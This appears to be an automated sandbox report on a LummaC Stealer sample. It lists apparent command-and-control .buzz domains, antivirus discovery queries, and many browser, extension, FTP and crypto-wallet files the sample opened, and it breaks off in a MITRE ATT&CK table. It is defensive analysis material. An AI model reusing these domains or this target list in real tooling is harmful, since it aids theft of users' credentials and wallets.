                Source: AaEBZ7icLd.exe, 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: cashfuzysao.buzz
                Source: AaEBZ7icLd.exe, 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: appliacnesot.buzz
                Source: AaEBZ7icLd.exe, 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: screwamusresz.buzz
                Source: AaEBZ7icLd.exe, 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: inherineau.buzz
                Source: AaEBZ7icLd.exe, 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: scentniej.buzz
                Source: AaEBZ7icLd.exe, 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: rebuildeso.buzz
                Source: AaEBZ7icLd.exe, 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: prisonyfork.buzz
                Source: AaEBZ7icLd.exe, 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: mindhandru.buzz
                Source: AaEBZ7icLd.exe, 00000000.00000002.2352086086.00000000005C2000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: qProgram Manager
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: AaEBZ7icLd.exe, 00000000.00000003.2302025063.0000000001093000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2301994724.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2301830725.00000000010D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: AaEBZ7icLd.exe PID: 5632, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: AaEBZ7icLd.exeString found in binary or memory: Wallets/Electrum
                Source: AaEBZ7icLd.exeString found in binary or memory: Wallets/ElectronCash
                Source: AaEBZ7icLd.exeString found in binary or memory: Jaxx Liberty
                Source: AaEBZ7icLd.exeString found in binary or memory: window-state.json
                Source: AaEBZ7icLd.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: AaEBZ7icLd.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: AaEBZ7icLd.exeString found in binary or memory: Wallets/Ethereum
                Source: AaEBZ7icLd.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: AaEBZ7icLd.exeString found in binary or memory: keystore
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: Yara matchFile source: 00000000.00000003.2277706743.0000000001084000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2277010991.0000000001084000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2279207879.0000000001084000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2277354845.0000000001084000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2278490614.0000000001084000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2279704777.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2278839639.0000000001084000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2276687938.0000000001084000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2276143171.0000000001084000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2279332488.0000000001084000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2275790023.0000000001083000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2278178086.0000000001084000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: AaEBZ7icLd.exe PID: 5632, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: AaEBZ7icLd.exe PID: 5632, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
